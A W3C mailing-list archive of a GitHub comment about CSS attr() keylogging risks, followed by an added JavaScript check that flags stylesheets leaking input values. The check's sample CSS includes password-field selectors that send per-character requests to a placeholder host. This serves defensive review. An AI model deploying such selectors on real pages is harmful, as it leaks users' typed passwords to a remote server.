Re: [csswg-drafts] [css-values] Keylogging concerns for attr() value

> Hmmm, if you can insert a sheet on a host you controlled, 

If you control the host, you can already do whatever you want. I don't think that's an attack scenario we have to worry about. ^_^  Because yeah, the best that `url(attr(value))` can do is resolve to some URL relative to the stylesheet, which means it can only be intercepted by the person controlling the server that the stylesheet is hosted on.

> It's more than that, really. If you type the password, $= would almost record the whole password string as you type. It has pitfalls, e.g. it cannot record repeated characters, and it wouldn't work if you use arrow keys etc. to insert character before. But yeah, it's reasonable enough to shrink the search space significantly.

Ah, indeed, that's clever.  (Tho again, it only works against things like React that spam the value property into the value attribute.)

-- 
GitHub Notification of comment by tabatkins
Please view or discuss this issue at https://github.com/w3c/csswg-drafts/issues/2339#issuecomment-367527212 using your GitHub account

Received on Thursday, 22 February 2018 00:37:03 UTC
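
A defender-side check for the pattern discussed in this message, as an added example that is not part of the original comment or of any CSSWG or browser code: it scans stylesheet text for rules that combine a substring selector on the `value` attribute (`$=`, `^=`, `*=`) with a `url()` fetch, and for `url(attr(value))`. The function name, the sample stylesheet and the `example.invalid` host are assumptions constructed for illustration.

```javascript
// Added example: static check for stylesheets that can leak an input's value attribute.
// SAMPLE_CSS is constructed for this example; example.invalid is a placeholder host.
const SAMPLE_CSS = `
/* benign: exact match, no fetch */
input[value="Submit"] { color: green; }
/* benign: substring match on href, not value */
a[href$=".pdf"] { background: url(pdf.png); }
@media screen {
  input[type="password"][value$="a"] { background-image: url("https://example.invalid/a"); }
  input[type="password"][value$='b' i] { background-image: url(https://example.invalid/b); }
}
input { background: url(attr(value)); }
`;

// [value$=...], [value^=...], [value*=...] with quoted or bare operand and optional i/s flag
const VALUE_SUBSTRING = /\[\s*value\s*(\$=|\^=|\*=)\s*("[^"]*"|'[^']*'|[^\]\s]+)\s*(?:[is]\s*)?\]/gi;
const URL_FETCH = /url\(/i;
const URL_ATTR_VALUE = /url\(\s*attr\(\s*value\b/i;

// Hypothetical helper: returns one finding per suspicious selector or declaration.
function findValueLeakRules(css) {
  const text = css.replace(/\/\*[\s\S]*?\*\//g, ""); // drop comments first
  const rule = /([^{}]+)\{([^{}]*)\}/g;              // innermost "selector { body }" blocks
  const findings = [];
  let m;
  while ((m = rule.exec(text)) !== null) {
    const selector = m[1].trim();
    const body = m[2];
    if (URL_ATTR_VALUE.test(body)) {
      findings.push({ selector, kind: "url(attr(value))", operand: null });
    }
    if (!URL_FETCH.test(body)) continue; // a value selector without a fetch leaks nothing
    for (const hit of selector.matchAll(VALUE_SUBSTRING)) {
      findings.push({ selector, kind: hit[1], operand: hit[2].replace(/^["']|["']$/g, "") });
    }
  }
  return findings;
}

console.log(findValueLeakRules(SAMPLE_CSS));
```

The check is textual, so it is a triage aid for reviewing third-party or user-supplied stylesheets rather than a full CSS parser; it does not follow `@import` or resolve custom properties.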